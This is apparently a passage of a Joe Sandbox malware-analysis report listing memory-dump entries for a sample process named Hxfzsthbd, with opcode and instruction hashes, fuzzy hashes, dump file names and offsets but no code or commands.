                                          • Opcode ID: 98464151805b1bf0910d4c0672b157296fd3f832374205c50146f3888d6df7d0
                                          • Instruction ID: 55b774e043e6129e392bf3295023777e8527cffd05182e33f4519ca6edad109a
                                          • Opcode Fuzzy Hash: 98464151805b1bf0910d4c0672b157296fd3f832374205c50146f3888d6df7d0
                                          • Instruction Fuzzy Hash: 04E0DFB090A359CFDB12CF24D9447483BB1EF41208F1582D5C1086B646CB394A498F42
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1513594431.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_5a70000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9427a65338716364a847666c4574ade65e345da83d9e194400c4139ffd6488da
                                          • Instruction ID: 19da272bf66bca0e20c5bd694ab134c349b6e5da10fa87b2644aafb154d43e14
                                          • Opcode Fuzzy Hash: 9427a65338716364a847666c4574ade65e345da83d9e194400c4139ffd6488da
                                          • Instruction Fuzzy Hash: ABE0C23080920CDFCB44DFE8C90067CBBB4EF46202F1484EDC80953391D6319E02CB80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d75589eafb780517d32010566e5120c9303f204f352cb8302430a66803ceb80f
                                          • Instruction ID: d96924339696f7384b51879bbd7b81dd70be230c060bc3a38bd984cd45d6904b
                                          • Opcode Fuzzy Hash: d75589eafb780517d32010566e5120c9303f204f352cb8302430a66803ceb80f
                                          • Instruction Fuzzy Hash: 5BE01274A00209EFCF44DFA8D94565E77F5EB44300F504598E909D7341E9716F049791
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1478006549.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_af0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1a1b3f3fa735ca2691ae668447eda1ac2bce91b1e85444fa8b81b20aee33038
                                          • Instruction ID: d8e8ab0777f5f0af64567d849beaa8c3b5fb47875f5a2d63c7af81dff6551835
                                          • Opcode Fuzzy Hash: e1a1b3f3fa735ca2691ae668447eda1ac2bce91b1e85444fa8b81b20aee33038
                                          • Instruction Fuzzy Hash: 70E0E270D1530CEFCB84EFF8D9852ADBBB4AB06205F2041EA990893390E7319A91CB81
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f7907a4cf397766d5689a6655ec4896d3de64f251332942a28a0b4342f436f6
                                          • Instruction ID: 22e4883e5db06024bf17e0e548b8a453447d99c7fc587c4f0e011cca3792a35d
                                          • Opcode Fuzzy Hash: 6f7907a4cf397766d5689a6655ec4896d3de64f251332942a28a0b4342f436f6
                                          • Instruction Fuzzy Hash: 8DE01A75B41119CFDB14EF50D645BAD7BF2EB8A300F1180A8D44973384CA345E50DF11
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23620c01be3cfdca9891fce706f593639e6e2b9dc40eade792f35ad76114ad13
                                          • Instruction ID: 1cff9b10b04c22b622f2d5be784b729576021e256e6e8c046a49e37ede6abdf4
                                          • Opcode Fuzzy Hash: 23620c01be3cfdca9891fce706f593639e6e2b9dc40eade792f35ad76114ad13
                                          • Instruction Fuzzy Hash: 08E07574A002548BDB94EF64D8957ADBBB2EB89305F50809AE409B7384DF345D859F10
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e943174be4380a10cf86d5a7d237bae4de89b61cf3cce1853f533deb79fd95f
                                          • Instruction ID: 0dc5600d9cb6ea23d94545f0f56a19ec99b3a87a7fc583c54e5b968a3a701e9a
                                          • Opcode Fuzzy Hash: 4e943174be4380a10cf86d5a7d237bae4de89b61cf3cce1853f533deb79fd95f
                                          • Instruction Fuzzy Hash: 85E01A74A04118CFDB94DF10DE996DEB7B2EB89300F0050A9D88AA3384DF755E81CF10
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1513594431.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_5a70000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 37b43471d189e5d65dfef1e0bc4f0d0dff9d0dabee3553fc4bfe48994cb21d38
                                          • Instruction ID: e4c849d2b816132b9a7145adcc673016995e5c92224abb326be00a4f9b3dcbab
                                          • Opcode Fuzzy Hash: 37b43471d189e5d65dfef1e0bc4f0d0dff9d0dabee3553fc4bfe48994cb21d38
                                          • Instruction Fuzzy Hash: 8FD0A97044A20CDFC748DBB88D04E7E73BEEB4320AF1004EC8408032A0CB325941C684
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1478006549.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_af0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04c99b6a3a2972354565a29bb365d9d80f0058a253d23de185320d36e6ce5a8d
                                          • Instruction ID: 6b8814c3b15585c3506834166eb0986ca78c1f8d0de365fe87bb3cae241ff133
                                          • Opcode Fuzzy Hash: 04c99b6a3a2972354565a29bb365d9d80f0058a253d23de185320d36e6ce5a8d
                                          • Instruction Fuzzy Hash: F5E092B8A01268CBDB20CF64CA44BD9B7F0AB08300F0040D5A549BB280D3B09E808F04
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d32ea6aa661392029c2e5f2bb5b26b24ac3cbb2c05f97d79618eadb5236346b4
                                          • Instruction ID: 59e91b62f9c14db197272c0d959581184a2f359a5d1377e6d65aa29a343e8236
                                          • Opcode Fuzzy Hash: d32ea6aa661392029c2e5f2bb5b26b24ac3cbb2c05f97d79618eadb5236346b4
                                          • Instruction Fuzzy Hash: 71D05EB560232ACBDB54DFA4D858B6937B2FB84300F108B94D40E77348EB398A858F02
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b8c928a32b3b117ded5ac610e00646b34ea886109649fa4962dae1115ffa377
                                          • Instruction ID: d439800af3523a9999618ee862d08527303724b5dcfd184ca487b3f022a8eea4
                                          • Opcode Fuzzy Hash: 5b8c928a32b3b117ded5ac610e00646b34ea886109649fa4962dae1115ffa377
                                          • Instruction Fuzzy Hash: 31E0FEB4D052A98FCB64CF64DC487ADBBB1BB49345F0085EA940EB3250EB745A85CF01
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 98d3b19616cb7b9ac7304df7b99e9d0970ef048df65670d123d269a1b859ca8f
                                          • Instruction ID: 59e91b62f9c14db197272c0d959581184a2f359a5d1377e6d65aa29a343e8236
                                          • Opcode Fuzzy Hash: 98d3b19616cb7b9ac7304df7b99e9d0970ef048df65670d123d269a1b859ca8f
                                          • Instruction Fuzzy Hash: 71D05EB560232ACBDB54DFA4D858B6937B2FB84300F108B94D40E77348EB398A858F02
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1478006549.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_af0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d8958de6e90dfb76f8a0f84282cabf71971c3959dd3d3c20b1dd66b04ae062c
                                          • Instruction ID: f50e6b4e9080d725d939270d54aed37e71c8198132b5b345dcc688476a9ae368
                                          • Opcode Fuzzy Hash: 9d8958de6e90dfb76f8a0f84282cabf71971c3959dd3d3c20b1dd66b04ae062c
                                          • Instruction Fuzzy Hash: 76E07EB4A022298FEB60CF64DD487DABBB1BF8A300F0050DA944DA6292D7700E80CF42
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5c0dc2addec01c1c00f217a8ae19beff81727b97cd0c30f462f25c78f3aecd7
                                          • Instruction ID: 69e7c4b44081fc12000b317ff91364aed99c7ba7976dbcf5743e345202a602ea
                                          • Opcode Fuzzy Hash: a5c0dc2addec01c1c00f217a8ae19beff81727b97cd0c30f462f25c78f3aecd7
                                          • Instruction Fuzzy Hash: CFD05E39541104CFC300DF64D440A48BBB1BF18214F404289D8059B236E330D805CF04
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1478006549.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_af0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93d2dd905071777f1e866fb803259d1a6e0c63ba9c2953575e73f017931bd5b4
                                          • Instruction ID: c792687b64ea34556e090b796f790772791fc1201199b39f32e1988cb7124dfb
                                          • Opcode Fuzzy Hash: 93d2dd905071777f1e866fb803259d1a6e0c63ba9c2953575e73f017931bd5b4
                                          • Instruction Fuzzy Hash: 4FC0123588D7C5EFCB12C7B179194883F319E17100B0800FADC85850B3D66154198B09
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35109fac50ee0aa4ad5fe47f268f197008aec23af9ac45832f36b5442b2e6b37
                                          • Instruction ID: 56f4050b06900da40c31be6f5b1ebc4ab10f5862aeb94c2c7cfaa9df2eeb29f0
                                          • Opcode Fuzzy Hash: 35109fac50ee0aa4ad5fe47f268f197008aec23af9ac45832f36b5442b2e6b37
                                          • Instruction Fuzzy Hash: 28C00239240204CFC204EF59E484C15B3A9AB4D6153514195E9195B335D631FC01CA44
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3d14cf87fb1efe60aac74646c5bdac2377f724c8e29dddc6bb68e570aa25a59
                                          • Instruction ID: 1871f9312e900b19b04fb836af9725401c448e1b1190f2e51fb98ca40ed8d0fa
                                          • Opcode Fuzzy Hash: f3d14cf87fb1efe60aac74646c5bdac2377f724c8e29dddc6bb68e570aa25a59
                                          • Instruction Fuzzy Hash: 27C00276E1001A9A8B00DAD9E9508DCBB74EB94321F404026E215A7104D63015268B54
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac35eab17d04ca660979c3a53cfbff722b673741d869400c6946a3d900cdadf3
                                          • Instruction ID: e6d2037051347f82f818079efd13215af93fb11677a2a1677700667985a578e7
                                          • Opcode Fuzzy Hash: ac35eab17d04ca660979c3a53cfbff722b673741d869400c6946a3d900cdadf3
                                          • Instruction Fuzzy Hash: AAC04C712056048BEB09AB60D1556693A72EBC2309F51512561463B1C8DF7848859751
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1512905495.00000000057A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_57a0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c33471b9d3454a584cddc6cc3ad412f1eab90db60a1562dc0a9e0cdc9c99e48
                                          • Instruction ID: a1366f811138a5d77ab987c674936e0e725c2d3886362716dd0fe94caaf1f4e4
                                          • Opcode Fuzzy Hash: 3c33471b9d3454a584cddc6cc3ad412f1eab90db60a1562dc0a9e0cdc9c99e48
                                          • Instruction Fuzzy Hash: ADB01267E941405BF7807660CC417D923D29FA2217FDB4070C548C1680E5DD98418802
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1478006549.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_af0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f9df69f813a9ebf0842f53ee2dbfc76faf2ba3afb03a49299549576c1e47296
                                          • Instruction ID: feb0d4552b32bb8ace3c4257d6d37638a8e6bb8726443cc76ec8431ee94e615c
                                          • Opcode Fuzzy Hash: 5f9df69f813a9ebf0842f53ee2dbfc76faf2ba3afb03a49299549576c1e47296
                                          • Instruction Fuzzy Hash: 1EB01236A40008DA4A0086D4B4080ECF730D380373F980062F70981801933001694640
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1478006549.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_af0000_Hxfzsthbd.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b683f655f9a6d3ce62acedc37cc2f283ecd3215f20f84559f7b056729c8b00f8
                                          • Instruction ID: 7aba41347b6d1986117f4f449a7db567ff33bf54fa1195f4dad70a6ee3236040
                                          • Opcode Fuzzy Hash: b683f655f9a6d3ce62acedc37cc2f283ecd3215f20f84559f7b056729c8b00f8
                                          • Instruction Fuzzy Hash: 29A01232C00A0BCF8200A7F1BC0D004375DA5011013800011A40D800705F6414014A48